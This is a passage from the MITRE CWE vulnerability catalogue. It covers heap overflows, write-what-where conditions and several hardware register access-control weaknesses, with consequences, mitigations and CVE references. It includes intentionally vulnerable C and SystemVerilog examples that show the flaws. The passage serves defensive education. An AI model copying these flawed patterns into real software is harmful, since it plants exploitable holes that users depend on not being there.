CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Relationships + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations, White_Box_Definitions + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Background_Details, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Potential_Mitigations, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). + + + + + + + Primary + + + + + + + + + Implementation + + + High + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. + + + Integrity + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Modify Memory + Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. Besides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code. Even in applications that do not explicitly use function pointers, the run-time will usually leave many in memory. For example, object methods in C++ are generally implemented using function pointers. Even in C programs, there is often a global offset table used by the underlying runtime. + + + Integrity + Confidentiality + Availability + Access Control + Other + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Other + When the consequence is arbitrary code execution, this can often be used to subvert any other security service. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + Pre-design: Use a language or compiler that performs automatic bounds checking. + + + Architecture and Design + Use an abstraction library to abstract away risky APIs. Not a complete solution. + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + Implementation + Implement and perform bounds checking on input. + + + Implementation + Libraries or Frameworks + Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary. + + + Operation + Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth. + + + + + While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, heap-based buffer overflows: + + #define BUFSIZE 256int main(int argc, char **argv) {char *buf;buf = (char *)malloc(sizeof(char)*BUFSIZE);strcpy(buf, argv[1]);} + + The buffer is allocated heap memory with a fixed size, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow. + + + This example applies an encoding procedure to an input string and stores it into a buffer. + + char * copy_input(char *user_supplied_string){ + int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ + if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ + + + /* encode to &lt; */ + + + }else dst_buf[dst_index++] = user_supplied_string[i]; + }return dst_buf; + } + + The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. + + + + + CVE-2007-4268 + Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) + https://www.cve.org/CVERecord?id=CVE-2007-4268 + + + CVE-2009-2523 + Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122). + https://www.cve.org/CVERecord?id=CVE-2009-2523 + + + CVE-2021-29529 + Chain: machine-learning product can have a heap-based + buffer overflow (CWE-122) when some integer-oriented bounds are + calculated by using ceiling() and floor() on floating point values + (CWE-1339) + https://www.cve.org/CVERecord?id=CVE-2021-29529 + + + + Memory + + + + Heap overflow + + + SFP8 + Faulty Buffer Access + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + CWE More Specific + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Heap-based buffer overflows are usually just as dangerous as stack-based buffer overflows. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Common_Consequences, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Likelihood_of_Exploit, Observed_Examples, References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Potential_Mitigations, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets. + + Integrated circuits and hardware engines can expose accesses to assets (device configuration, keys, etc.) to trusted firmware or a software module (commonly set by BIOS/bootloader). This access is typically access-controlled. Upon a power reset, the hardware or system usually starts with default values in registers, and the trusted firmware (Boot firmware) configures the necessary access-control protection. + A common weakness that can exist in such protection schemes is that access controls or policies are not granular enough. This condition allows agents beyond trusted agents to access assets and could lead to a loss of functionality or the ability to set up the device securely. This further results in security risks from leaked, sensitive, key material to modification of device configuration. + + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during hardware implementation and identified later during Testing or System Configuration phases. + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Other + High + + + + + Architecture and Design + Implementation + Testing + + + Access-control-policy protections must be reviewed for design inconsistency and common weaknesses. + Access-control-policy definition and programming flow must be tested in pre-silicon, post-silicon testing. + + + High + + + + + + Consider a system with a register for storing AES key for encryption or decryption. The key is 128 bits, implemented as a set of four 32-bit registers. The key registers are assets and registers, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary access controls. + The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each register is a 32-bit register, and it can support access control for a maximum of 32 agents. The number of the bit when set (i.e., "1") allows respective action from an agent whose identity matches the number of the bit and, if "0" (i.e., Clear), disallows the respective action to that corresponding agent. + + + + + Register + Field description + + + AES_ENC_DEC_KEY_0 + AES key [0:31] for encryption or decryptionDefault 0x00000000 + + + AES_ENC_DEC_KEY_1 + AES key [32:63] for encryption or decryptionDefault 0x00000000 + + + AES_ENC_DEC_KEY_2 + AES key [64:95] for encryption or decryptionDefault 0x00000000 + + + AES_ENC_DEC_KEY_4 + AES key [96:127] for encryption or decryptionDefault 0x00000000 + + + AES_KEY_READ_WRITE_POLICY + [31:0] Default 0x00000006 - meaning agent with identities "1" and "2" can both read from and write to key registers + + + + In the above example, there is only one policy register that controls access to both read and write accesses to the AES-key registers, and thus the design is not granular enough to separate read and writes access for different agents. Here, agent with identities "1" and "2" can both read and write. + A good design should be granular enough to provide separate access controls to separate actions. Access control for reads should be separate from writes. Below is an example of such implementation where two policy registers are defined for each of these actions. The policy is defined such that: the AES-key registers can only be read or used by a crypto agent with identity "1" when bit #1 is set. The AES-key registers can only be programmed by a trusted firmware with identity "2" when bit #2 is set. + + + + AES_KEY_READ_POLICY + [31:0] Default 0x00000002 - meaning only Crypto engine with identity "1" can read registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 + + + AES_KEY_WRITE_POLICY + [31:0] Default 0x00000004 - meaning only trusted firmware with identity "2" can program registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 + + + + + + Consider the following SoC + design. The sram in HRoT has an address range that is readable and writable by unprivileged + software and it has an area that is only readable by unprivileged software. The tbus + interconnect enforces access control for slaves on the bus but uses only one bit to control + both read and write access. Address 0xA0000000 - 0xA000FFFF is readable and writable + by the untrusted cores core{0-N} and address 0xA0010000 - 0xA001FFFF is only + readable by the untrusted cores core{0-N}. + + + + The security policy access control is not granular enough, as it uses one bit to enable both + read and write access. This gives write access to an area that should only be readable + by unprivileged agents. + + + Access control logic should differentiate between read and write access and to have + sufficient address granularity. + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-05 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Tortuga Logic + 2021-07-16 + Provided Demonstrative Example for Hardware Root of Trust + + + + + Hardware description language code incorrectly defines register defaults or hardware IP parameters to insecure values. + + Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. Hardware descriptive languages also support definition of parameter variables, which can be defined in code during instantiation of the hardware IP module. Such parameters are generally used to configure a specific instance of a hardware IP in the design. + The system security settings of a hardware design can be affected by incorrectly defined default values or IP parameters. The hardware IP would be in an insecure state at power reset, and this can be exposed or exploited by untrusted software running on the system. Both register defaults and parameters are hardcoded values, which cannot be changed using software or firmware patches but must be changed in hardware silicon. Thus, such security issues are considerably more difficult to address later in the lifecycle. Hardware designs can have a large number of such parameters and register defaults settings, and it is important to have design tool support to check these settings in an automated way and be able to identify which settings are security sensitive. + + + + + + + + + + + + Implementation + Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases. + + + + + Confidentiality + Integrity + Availability + Access Control + Varies by Context + Degradation of system functionality, or loss of access control enforcement can occur. + + + + + Architecture and Design + During hardware design, all the system parameters and register defaults must be reviewed to identify security sensitive settings. + + + Implementation + The default values of these security sensitive settings need to be defined as part of the design review phase. + + + Testing + Testing phase should use automated tools to test that values are configured per design specifications. + + + + + Consider example design module system verilog code shown below.register_example module is an example parameterized module that defines two parameters, REGISTER_WIDTH and REGISTER_DEFAULT. Register_example module defines a Secure_mode setting, which when set makes the register content read-only and not modifiable by software writes. register_top module instantiates two registers, Insecure_Device_ID_1 and Insecure_Device_ID_2. Generally, registers containing device identifier values are required to be read only to prevent any possibility of software modifying these values. + + // Parameterized Register module example + // Secure_mode : REGISTER_DEFAULT[0] : When set to 1 register is read only and not writable// + module register_example + #( + parameter REGISTER_WIDTH = 8, // Parameter defines width of register, default 8 bits + parameter [REGISTER_WIDTH-1:0] REGISTER_DEFAULT = 2**REGISTER_WIDTH -2 // Default value of register computed from Width. Sets all bits to 1s except bit 0 (Secure _mode) + ) + ( + input [REGISTER_WIDTH-1:0] Data_in, + input Clk, + input resetn, + input write, + output reg [REGISTER_WIDTH-1:0] Data_out + ); + + reg Secure_mode; + + always @(posedge Clk or negedge resetn) + + if (~resetn) + begin + + Data_out <= REGISTER_DEFAULT; // Register content set to Default at reset + Secure_mode <= REGISTER_DEFAULT[0]; // Register Secure_mode set at reset + + end + else if (write & ~Secure_mode) + begin + + Data_out <= Data_in; + + end + + endmodule + + + module register_top + ( + input Clk, + input resetn, + input write, + input [31:0] Data_in, + output reg [31:0] Secure_reg, + output reg [31:0] Insecure_reg + ); + + register_example #( + + .REGISTER_WIDTH (32), + .REGISTER_DEFAULT (1224) // Incorrect Default value used bit 0 is 0. + + ) Insecure_Device_ID_1 ( + + .Data_in (Data_in), + .Data_out (Secure_reg), + .Clk (Clk), + .resetn (resetn), + .write (write) + + ); + + register_example #( + + .REGISTER_WIDTH (32) // Default not defined 2^32-2 value will be used as default. + + ) Insecure_Device_ID_2 ( + + .Data_in (Data_in), + .Data_out (Insecure_reg), + .Clk (Clk), + .resetn (resetn), + .write (write) + + ); + + endmodule + + These example instantiations show how, in a hardware design, it would be possible to instantiate the register module with insecure defaults and parameters. + In the example design, both registers will be software writable since Secure_mode is defined as zero. + + register_example #( + + .REGISTER_WIDTH (32), + .REGISTER_DEFAULT (1225) // Correct default value set, to enable Secure_mode + + ) Secure_Device_ID_example ( + + .Data_in (Data_in), + .Data_out (Secure_reg), + .Clk (Clk), + .resetn (resetn), + .write (write) + + ); + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-12-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Common_Consequences + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process. + + Integrated circuits and hardware IPs can expose the device configuration controls that need to be programmed after device power reset by a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. In hardware design, this is commonly implemented using a programmable lock bit which enables/disables writing to a protected set of registers or address regions. When the programmable lock bit is set, the relevant address region can be implemented as a hardcoded value in hardware logic that cannot be changed later. + A problem can arise wherein the protected region definition is not granular enough. After the programmable lock bit has been set, then this new functionality cannot be implemented without change to the hardware design. + + + + + + + + + + + + + Architecture and Design + Such issues are introduced during hardware architecture and design since software controls and configuration are defined during these phases and identified later during Testing or System Configuration phases. + + + + + Access Control + Other + System security configuration cannot be defined in a way that does not conflict with functional requirements of device. + + + + + Architecture and Design + + The defining of protected locked registers should be reviewed or tested early in the design phase with software teams to ensure software flows are not blocked by the security locks. + As an alternative to using register lock control bits and fixed access control regions, the hardware design could use programmable security access control configuration so that device trusted firmware can configure and change the protected regions based on software usage and security models. + + + + + + For example, consider a hardware unit with a 32 kilobyte configuration address space where the first 8 kilobyte address contains security sensitive controls that must only be writable by device bootloader. One way to protect the security configuration could be to define a 32 bit system configuration locking register (SYS_LOCK) where each bit lock locks the corresponding 1 kilobyte region. + + + + + Address + Register + + + 0x0000 + SYS_LOCK: 32 bit system configuration lock register, each bit is write-1-once + + + 0x0004 + SECURITY_FEATURE_ENABLE: 32 bit register controlling enabling of security features + + + ... + + + + 0x0310 + SW_MODE: 32 bit Software Mode indication register + + + + + + + Address region + Lock bit + + + 0x0000 - 0x03FF + SYS_LOCK[0] + + + 0x0400 - 0x07FF + SYS_LOCK[1] + + + ... + + + + 0x7C00 - 0x7FFF + SYS_LOCK[31] + + + + + If a register exists within the first kilobyte address range (e.g. SW_MODE, address 0x310) and needs to be software writable at runtime, then this register cannot be written in a securely configured system since SYS_LOCK register lock bit 0 must be set to protect other security settings (e.g. SECURITY_FEATURE_ENABLE, address 0x0004). The only fix would be to change the hardware logic or not set the security lock bit. + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-12-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue. + + Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make them write-once. This means the hardware implementation only allows writing to such registers once, and they become read-only after having been written once by software. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings. + Implementation issues in hardware design of such controls can expose such registers to a race condition security flaw. For example, consider a hardware design that has two different software/firmware modules executing in parallel. One module is trusted (module A) and another is untrusted (module B). In this design it could be possible for Module B to send write cycles to the write-once register before Module A. Since the field is write-once the programmed value from Module A will be ignored and the pre-empted value programmed by Module B will be used by hardware. + + + + + + + + + + + + Architecture and Design + This weakness can appear in designs that use register write-once attributes with two or more software/firmware modules with varying levels of trust executing in parallel. + + + + + Access Control + Bypass Protection Mechanism + System configuration cannot be programmed in a secure way. + + + + + Architecture and Design + During hardware design all register write-once or sticky fields must be evaluated for proper configuration. + + + Testing + The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros. + + + + + consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. + + module register_write_once_example + ( + + input [15:0] Data_in, + input Clk, + input ip_resetn, + input global_resetn, + input write, + output reg [15:0] Data_out + + ); + + reg Write_once_status; + + always @(posedge Clk or negedge ip_resetn) + if (~ip_resetn) + + begin + + Data_out <= 16'h0000; + Write_once_status <= 1'b0; + + end + + else if (write & ~Write_once_status) + + begin + + Data_out <= Data_in & 16'hFFFE; // Input data written to register after masking bit 0 + Write_once_status <= 1'b1; // Write once status set after first write. + + end + + else if (~write) + + begin + + Data_out[15:1] <= Data_out[15:1]; + Data_out[0] <= Write_once_status; + + end + + endmodule + + The first system component that sends a write cycle to this register can program the value. This could result in a race condition security issue in the SoC design, if an untrusted agent is running in the system in parallel with the trusted component that is expected to program the register. + + Trusted firmware or software trying to set the write-once field: + + Must confirm the Write_once_status (bit 0) value is zero, before programming register. If another agent has programmed the register before, then Write_once_status value will be one. + After writing to the register, the trusted software can issue a read to confirm that the valid setting has been programmed. + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-12-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The hardware design control register "sticky bits" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software. + + Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to define default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make the settings write-once or "sticky." This allows writing to such registers only once, whereupon they become read-only. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings. + Failure to implement write-once restrictions in hardware design can expose such registers to being re-programmed by software and written multiple times. For example, write-once fields could be implemented to only be write-protected if they have been set to value "1", wherein they would work as "write-1-once" and not "write-once". + + + + + + + + + + + + Architecture and Design + + + Implementation + Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases. + + + + + Confidentiality + Integrity + Availability + Access Control + Varies by Context + System configuration cannot be programmed in a secure way. + + + + + Architecture and Design + During hardware design all register write-once or sticky fields must be evaluated for proper configuration. + + + Testing + The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros. + + + + + Consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. This implementation can be for a register that is defined by specification to be a write-once register, since the write_once_status field gets written by input data bit 0 on first write. + + module register_write_once_example + ( + input [15:0] Data_in, + input Clk, + input ip_resetn, + input global_resetn, + input write, + output reg [15:0] Data_out + ); + + reg Write_once_status; + + always @(posedge Clk or negedge ip_resetn) + + if (~ip_resetn) + begin + + Data_out <= 16'h0000; + Write_once_status <= 1'b0; + + end + else if (write & ~Write_once_status) + begin + + Data_out <= Data_in & 16'hFFFE; + Write_once_status <= Data_in[0]; // Input bit 0 sets Write_once_status + + end + else if (~write) + begin + + Data_out[15:1] <= Data_out[15:1]; + Data_out[0] <= Write_once_status; + + end + + endmodule + + The above example only locks further writes if write_once_status bit is written to one. So it acts as write_1-Once instead of the write-once attribute. + + module register_write_once_example + ( + input [15:0] Data_in, + input Clk, + input ip_resetn, + input global_resetn, + input write, + output reg [15:0] Data_out + ); + + reg Write_once_status; + + always @(posedge Clk or negedge ip_resetn) + + if (~ip_resetn) + begin + + Data_out <= 16'h0000; + Write_once_status <= 1'b0; + + end + else if (write & ~Write_once_status) + begin + + Data_out <= Data_in & 16'hFFFE; + Write_once_status <= 1'b1; // Write once status set on first write, independent of input + + end + else if (~write) + begin + + Data_out[15:1] <= Data_out[15:1]; + Data_out[0] <= Write_once_status; + + end + + + endmodule + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-12-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product manages resources or behaves in a way that indirectly creates a new, distinct resource that can be used by attackers in violation of the intended policy. + + A product is only expected to behave in a way that was specifically intended by the developer. Resource allocation and management is expected to be performed explicitly by the associated code. However, in systems with complex behavior, the product might indirectly produce new kinds of resources that were never intended in the original design. For example, a covert channel is a resource that was never explicitly intended by the developer, but it is useful to attackers. "Parasitic computing," while not necessarily malicious in nature, effectively tricks a product into performing unintended computations on behalf of another party. + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2020-01-22 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow. + + + + + + + + Resultant + + + + + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Access Control + Modify Memory + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + DoS: Crash, Exit, or Restart + Bypass Protection Mechanism + Clearly, write-what-where conditions can be used to write data to areas of memory outside the scope of a policy. Also, they almost invariably can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. If the attacker can overwrite a pointer's worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator. + + + Integrity + Availability + DoS: Crash, Exit, or Restart + Modify Memory + Many memory accesses can lead to program termination, such as when writing to addresses that are invalid for the current process. + + + Access Control + Other + Bypass Protection Mechanism + Other + When the consequence is arbitrary code execution, this can often be used to subvert any other security service. + + + + + Architecture and Design + Language Selection + Use a language that provides appropriate memory abstractions. + + + Operation + Use OS-level preventative functionality integrated after the fact. Not a complete solution. + + + + + The classic example of a write-what-where condition occurs when the accounting information for memory allocations is overwritten in a particular fashion. Here is an example of potentially vulnerable code: + + #define BUFSIZE 256int main(int argc, char **argv) {char *buf1 = (char *) malloc(BUFSIZE);char *buf2 = (char *) malloc(BUFSIZE);strcpy(buf1, argv[1]);free(buf2);} + + Vulnerability in this case is dependent on memory layout. The call to strcpy() can be used to write past the end of buf1, and, with a typical layout, can overwrite the accounting information that the system keeps for buf2 when it is allocated. Note that if the allocation header for 